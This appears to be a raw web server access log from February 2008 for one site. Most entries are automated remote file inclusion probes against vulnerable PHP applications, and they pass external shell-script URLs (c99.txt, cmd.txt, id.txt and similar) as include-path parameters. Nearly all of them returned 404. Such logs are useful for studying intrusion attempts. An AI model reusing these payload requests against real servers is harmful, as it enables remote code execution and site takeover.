85.234.144.91 - - [03/Feb/2008:16:00:36 -0800] "GET /logs/access.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.zaralazgin.com/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.91 - - [03/Feb/2008:16:00:37 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.zaralazgin.com/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.91 - - [03/Feb/2008:16:00:37 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.zaralazgin.com/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
81.169.180.163 - - [03/Feb/2008:16:02:15 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
81.169.180.163 - - [03/Feb/2008:16:02:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.zyssetd.ch/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
70.85.82.84 - - [03/Feb/2008:16:03:27 -0800] "GET /logs/access_071231.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adrianuzzo1986.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.82.84 - - [03/Feb/2008:16:03:27 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adrianuzzo1986.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.85.82.84 - - [03/Feb/2008:16:03:27 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://adrianuzzo1986.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:16:03:55 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:16:03:55 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
212.244.196.210 - - [03/Feb/2008:16:05:57 -0800] "GET /logs/access_071119.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.244.196.210 - - [03/Feb/2008:16:06:00 -0800] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.244.196.210 - - [03/Feb/2008:16:06:01 -0800] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:16:06:16 -0800] "GET /logs/access_071224.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:16:06:16 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:16:06:16 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.87.139.98 - - [03/Feb/2008:16:06:22 -0800] "GET /logs/access_071119.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:16:06:37 -0800] "GET /logs/access_080107.log/prod.php?prod=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:16:06:49 -0800] "GET /logs/access_080107.log/prod.php?prod=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.91.2 - - [03/Feb/2008:16:06:51 -0800] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
207.210.91.2 - - [03/Feb/2008:16:06:51 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:16:08:02 -0800] "GET /config.inc.php?path_escape=http://findonline.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.237.148.55 - - [03/Feb/2008:16:08:03 -0800] "GET /config.inc.php?path_escape=http://exhumed.ifrance.com/list? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
66.7.194.105 - - [03/Feb/2008:16:08:47 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.jackiecollins.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
80.38.160.131 - - [03/Feb/2008:16:08:51 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.38.160.131 - - [03/Feb/2008:16:08:51 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:09:31 -0800] "GET /logs/access_071210.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.233.4.83 - - [03/Feb/2008:16:10:01 -0800] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://real-spam.com/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
193.28.233.17 - - [03/Feb/2008:16:12:00 -0800] "GET /logs/index.php?body=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.28.233.17 - - [03/Feb/2008:16:12:00 -0800] "GET /logs/index.php?body=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.28.233.17 - - [03/Feb/2008:16:12:00 -0800] "GET /index.php?body=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.28.233.17 - - [03/Feb/2008:16:12:00 -0800] "GET /index.php?body=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:16:13:19 -0800] "GET //myPHPCalendar/admin.php?cal_dir=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
193.205.186.244 - - [03/Feb/2008:16:13:20 -0800] "GET /logs//myPHPCalendar/admin.php?cal_dir=http://www.das-gruene-eckchen.de/wbblite/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.toulouseangloexchange.com"
83.199.125.235 - - [03/Feb/2008:16:13:33 -0800] "GET /logs/access.log HTTP/1.0" 200 7967 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:14:11 -0800] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:14:11 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:14:57 -0800] "GET /logs/access_071217.log/convert/mvcw.php?vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:14:57 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:15:48 -0800] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:15:51 -0800] "GET /logs/access_071217.log/convert/mvcw.php?step=1&vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:15:51 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:16:41 -0800] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:17:41 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
207.210.91.2 - - [03/Feb/2008:16:17:41 -0800] "GET /logs/access_071231.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:16:19:30 -0800] "GET /logs/access.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:19:36 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:19:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:19:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:16:19:37 -0800] "GET //index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
217.160.75.184 - - [03/Feb/2008:16:19:38 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
217.160.75.184 - - [03/Feb/2008:16:19:38 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
217.160.75.184 - - [03/Feb/2008:16:19:38 -0800] "GET /logs/%3Cwbr%20//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:16:19:45 -0800] "GET /logs//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:16:21:31 -0800] "GET /logs/access.log//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:16:21:38 -0800] "GET //index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
67.91.198.51 - - [03/Feb/2008:16:21:43 -0800] "GET /logs//index.php?option=com_weblinks&Itemid=4/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
217.160.75.184 - - [03/Feb/2008:16:23:41 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071105.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
211.115.89.60 - - [03/Feb/2008:16:23:47 -0800] "GET /logs/access_080107.log/prod.php?prod=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:25:04 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071022.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:25:04 -0800] "GET //phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:25:05 -0800] "GET /logs/%3Cwbr%20//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:26:28 -0800] "GET /logs/access_080114.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:26:55 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:26:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:26:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:27:07 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:27:08 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:27:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:27:22 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:27:22 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.105 - - [03/Feb/2008:16:27:22 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
212.244.196.210 - - [03/Feb/2008:16:29:10 -0800] "GET /logs/access_071203.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
80.199.102.117 - - [03/Feb/2008:16:29:52 -0800] "GET /logs/%3Cwbr%20/%3Eaccess_071105.log//phpSecurePages/secure.php?&cfgProgDir=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:16:31:08 -0800] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
207.58.184.170 - - [03/Feb/2008:16:31:09 -0800] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:32:47 -0800] "GET /logs/scripts.log/index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:32:48 -0800] "GET /index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:32:48 -0800] "GET /logs/index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
217.71.208.150 - - [03/Feb/2008:16:33:29 -0800] "GET /logs/access.log////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.71.208.150 - - [03/Feb/2008:16:33:29 -0800] "GET ////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.71.208.150 - - [03/Feb/2008:16:33:29 -0800] "GET /logs////////vwar/convert/mvcw.php?step=1&vwar_root=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.246.41.127 - - [03/Feb/2008:16:35:07 -0800] "GET /logs/access.log/write.php?dir=http://theninjalegion.com/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:38:21 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:38:22 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:38:22 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.202.124.101 - - [03/Feb/2008:16:38:50 -0800] "GET //components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
64.202.124.101 - - [03/Feb/2008:16:38:50 -0800] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:16:42:37 -0800] "GET /logs/scripts.log/index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:16:42:37 -0800] "GET /index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:16:42:37 -0800] "GET /logs/index.php3?act=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.173.115 - - [03/Feb/2008:16:42:41 -0800] "GET /logs/access_080121.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:43:59 -0800] "GET /logs/access_071203.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:43:59 -0800] "GET //plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
213.219.244.8 - - [03/Feb/2008:16:43:59 -0800] "GET /logs//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
193.109.252.52 - - [03/Feb/2008:16:44:19 -0800] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.toulouseangloexchange.com"
193.109.252.52 - - [03/Feb/2008:16:44:19 -0800] "GET /logs/m2f/m2f_phpbb204.php?m2f_root_path=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.toulouseangloexchange.com"
209.35.191.126 - - [03/Feb/2008:16:45:15 -0800] "GET /logs/all%22.php?p=%22http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
209.35.191.126 - - [03/Feb/2008:16:45:15 -0800] "GET /all%22.php?p=%22http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:16:45:18 -0800] "GET /logs/access_071203.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:16:45:19 -0800] "GET //plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
89.111.176.28 - - [03/Feb/2008:16:45:19 -0800] "GET /logs//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:16:47:15 -0800] "GET /logs/access_071203.log//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:16:47:16 -0800] "GET //plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.168.42 - - [03/Feb/2008:16:47:16 -0800] "GET /logs//plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.25.2 - - [03/Feb/2008:16:47:32 -0800] "GET /logs/access_080114.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.7.194.105 - - [03/Feb/2008:16:47:32 -0800] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.jackiecollins.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.93.25.2 - - [03/Feb/2008:16:47:32 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.7.194.105 - - [03/Feb/2008:16:47:32 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.jackiecollins.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
